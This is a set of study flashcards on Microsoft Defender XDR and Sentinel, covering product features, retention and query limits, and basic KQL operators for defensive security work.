Microsoft Defender and Sentinel Overview

A comprehensive set of flashcards covering key concepts related to Microsoft Defender and Sentinel, including features, functions, and terms pivotal for understanding cybersecurity tools.

Microsoft Defender portal

The unified portal used for Microsoft Defender XDR.

Incident Graph

The feature in Defender XDR that visually maps out an attack story across endpoints, identities, and cloud apps.

30 days

The default retention period for Advanced Hunting data in Defender XDR.

Attack Simulation Training

The feature in Defender XDR that allows you to simulate phishing attacks to train employees.

Live Response

The feature in Defender for Endpoint that provides a real-time remote shell to investigate a machine.

Attack Surface Reduction (ASR) rules

Rules designed to block malicious behaviors and scripts commonly used by attackers.

Defender for Identity Sensor

The tool that must be deployed on a Domain Controller to integrate with Microsoft Defender for Identity.

DCSync attack

The alert that indicates an attacker is attempting to extract the NTDS.dit database from a Domain Controller.

Safe Links

The policy in Microsoft Defender for Office 365 that protects users from malicious URLs by scanning them at the time of click.

Safe Attachments

The policy in Microsoft Defender for Office 365 that detonates email attachments in a sandbox before delivery.

Secure Score

The primary metric Defender for Cloud uses to measure your security posture.

Azure Arc

The deployment required to protect and manage multi-cloud resources (AWS, GCP) from Defender for Cloud.

Just-In-Time (JIT) VM Access

The feature in Defender for Cloud that allows you to open management ports on a VM only for a limited time.

Adaptive Application Controls

The feature in Defender for Cloud that learns normal VM behavior and alerts on unexpected applications launching.

Defender for Containers

The Defender for Cloud plan specifically designed to protect Kubernetes clusters.

Cloud Access Security Broker (CASB)

The primary function of Microsoft Defender for Cloud Apps.

App Connectors

The deployment method in Defender for Cloud Apps that uses API integrations with services like Salesforce or AWS.

Session Policies (Conditional Access App Control)

The policy in Defender for Cloud Apps that monitors and controls user sessions in real-time.

Cloud Discovery

The feature that allows Defender for Cloud Apps to parse firewall logs and identify unsanctioned SaaS applications.

Regulatory Compliance Dashboard

The dashboard in Defender for Cloud that maps your resources against standards like ISO 27001 or PCI-DSS.

Log Analytics (Azure Data Explorer)

The underlying database technology powering a Microsoft Sentinel workspace.

Advanced Security Information Model (ASIM)

The built-in Microsoft Sentinel component that allows normalizing logs from multiple vendors into a standard format.

Scheduled Analytics Rule

The type of Sentinel analytics rule that uses KQL to query logs at a specific interval and generate alerts.

Near Real-Time (NRT) Rules

The Sentinel analytics rule type designed to run every minute for immediate threat detection.

Fusion Rules

The feature in Microsoft Sentinel that correlates high-fidelity alerts from multiple sources into a single incident using machine learning.

Azure Logic Apps

The Azure service required to build and run automated Playbooks in Microsoft Sentinel.

Watchlists

The feature that allows importing external data to correlate with Sentinel logs.

Data Connectors

The component that acts as the bridge to ingest data from third-party sources into Sentinel.

Azure Monitor Agent (AMA)

The agent that must be installed to ingest Syslog or CEF data from Linux servers into Sentinel.

Bookmarks

The feature that allows security analysts to preserve KQL query results to attach to an incident for later review.

Investigation Graph

The visual tool in Microsoft Sentinel that maps relationships between alerts, entities, and bookmarks during an investigation.

Workbooks

The feature in Sentinel that provides interactive visual reports and dashboards for your data.

730 days (2 years)

The maximum data retention period for interactive querying in a Log Analytics workspace before archiving.

Automation Rules

The feature in Sentinel that allows you to group and centrally manage automated response actions.

Microsoft Sentinel Responder

The Azure RBAC role required to assign and run playbooks in Sentinel.

Content Hub Solutions

The feature that provides pre-packaged collections of data connectors, analytics rules, and workbooks for specific products.

Data Collection Rules (DCR) / Log Ingestion API

The type of data connector that relies on a REST API to push logs into the Sentinel workspace.

Data Collection Rules (DCR) transformations

The component used to parse and enrich data during ingestion before it is stored in Sentinel.

User and Entity Behavior Analytics (UEBA)

The Sentinel feature that identifies anomalous user activity by establishing a baseline of normal behavior.

Entity mapping

The process in UEBA of mapping log data to standard Sentinel entities.

where

The KQL operator used to filter a table to only show specific rows that match a condition.

summarize

The KQL operator that groups data together and calculates aggregations.

project

The KQL operator used to select specific columns to include in the output.

project-away

The KQL operator that removes specific columns from the query output.

extend

The KQL operator used to create a new custom column or calculate a value based on existing columns.

join

The KQL operator that combines rows from two tables based on a common matching column.

union

The KQL operator that combines two or more tables and returns all rows.

let

The KQL statement that allows assigning a variable name to an expression or subquery.

take (or limit)

The KQL operator used to return a specific number of arbitrary rows.

now()

The KQL function that returns the current date and time.

parse

The KQL operator used to extract data from a string into new columns using regular expressions.

sort by (or order by)

The KQL operator that sorts the rows of the input table by one or more columns.

search

The KQL operator that searches across all columns in a table for a specific string value.

distinct

The KQL operator that removes duplicate rows from a result set based on a specific column.

count

The KQL function that returns the number of rows in a table.

make-series

The KQL operator that generates a series of values, often used to create time charts.

bin()

The KQL function used to bin or group time data into specific intervals.

10,000

The maximum number of records a single query in Defender XDR Advanced Hunting can return.

10 minutes

The execution timeout limit for a single query in Defender XDR Advanced Hunting.

render

The KQL operator that renders the query results into a visual chart.

Device Isolation

The feature in Defender for Endpoint that isolates a compromised device from the network.

Full automation

The level of automation in Defender for Endpoint that investigates and remediates threats automatically.

Action Center

The centralized location in Defender XDR to review and approve pending remediation actions.

Honeytokens

The Defender for Identity feature that simulates a highly privileged fake account to trap attackers.

Diagnostic Settings

The Azure feature that must be configured to forward Azure AD sign-in logs to Microsoft Sentinel.

Add an indicator to block the file hash

The action in Defender XDR that stops a specific malicious executable from running on any enrolled endpoint.

Microsoft Security Copilot

The Microsoft tool that uses generative AI to assist analysts with incident summaries and KQL generation.

Promptbooks

The feature in Security Copilot that allows saving sequences of prompts for repetitive tasks.

Plugins

What must be configured to allow Security Copilot to pull data from third-party security products.

SQL Vulnerability Assessment

The Defender for Cloud feature that identifies vulnerabilities in SQL databases.

Microsoft Purview

The Microsoft tool that provides centralized visibility and governance for data sensitivity and compliance.

Threat Explorer

The feature in Defender for Office 365 that shows the exact delivery path of an email.

Device Discovery

The Defender for Endpoint feature that helps discover unmanaged endpoints, network devices, and IoT devices.

Custom Detection Rules

The Defender XDR feature that allows you to create custom alerts based on Advanced Hunting KQL query results.

The analyst must have the appropriate RBAC permissions and the file must not exceed size limits.

What is required before an analyst can download a file using Live Response in Defender for Endpoint.

Microsoft Defender Threat Intelligence (MDTI)

To provide raw threat intelligence, indicators of compromise (IOCs), and adversary profiles for proactive hunting.

Archived Logs

The feature that should be configured in Sentinel to retain logs for up to 7 years for compliance.